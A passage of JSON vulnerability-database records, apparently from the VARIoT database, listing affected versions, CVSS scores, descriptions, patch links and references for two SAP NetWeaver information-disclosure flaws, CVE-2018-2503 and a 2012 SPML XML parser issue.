"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "BID",
"id": "106156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2503"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "106156"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2503",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2503",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.4,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-2503",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2503",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201812-480",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "By default, the SAP NetWeaver AS Java keystore service does not sufficiently restrict the access to resources that should be protected. This has been fixed in SAP NetWeaver AS Java (ServerCore versions 7.11, 7.20, 7.30, 7.31, 7.40, 7.50). SAP NetWeaver is prone to an information disclosure vulnerability. \nAn attacker can exploit this issue to gain sensitive information, that may aid in further attacks. \nNetWeaver 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "BID",
"id": "106156"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2503",
"trust": 2.7
},
{
"db": "BID",
"id": "106156",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013045",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201812-480",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "106156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"id": "VAR-201812-0566",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:02:23.756000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - December 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=508559699"
},
{
"title": "SAP NetWeaver AS Java Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=87728"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.0
},
{
"problemtype": "CWE-285",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "NVD",
"id": "CVE-2018-2503"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=508559699"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/106156"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2658279"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2503"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2503"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2658279"
}
],
"sources": [
{
"db": "BID",
"id": "106156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "106156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-11T00:00:00",
"db": "BID",
"id": "106156"
},
{
"date": "2019-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"date": "2018-12-11T22:29:00.593000",
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"date": "2018-12-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-11T00:00:00",
"db": "BID",
"id": "106156"
},
{
"date": "2019-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013045"
},
{
"date": "2021-09-09T17:17:24.160000",
"db": "NVD",
"id": "CVE-2018-2503"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java keystore Authorization vulnerabilities in services",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013045"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-480"
}
],
"trust": 0.6
}
}
var-201212-0415
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. SAP NetWeaver 6.40 and 7.02 are vulnerable; other versions may also be affected.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201212-0415",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.40"
}
],
"sources": [
{
"db": "BID",
"id": "57533"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexey Tyurin of ERPScan",
"sources": [
{
"db": "BID",
"id": "57533"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAn attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.\nSAP NetWeaver 6.40 and 7.02 are vulnerable; other versions may also be affected.",
"sources": [
{
"db": "BID",
"id": "57533"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "57533",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "57533"
}
]
},
"id": "VAR-201212-0415",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:55:58.521000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-12-043-sap-netweaver-spml-xml-external-entity/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "57533"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "57533"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-12-15T00:00:00",
"db": "BID",
"id": "57533"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-12-15T00:00:00",
"db": "BID",
"id": "57533"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "57533"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver SPML Service XML Parser Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "57533"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "57533"
}
],
"trust": 0.3
}
}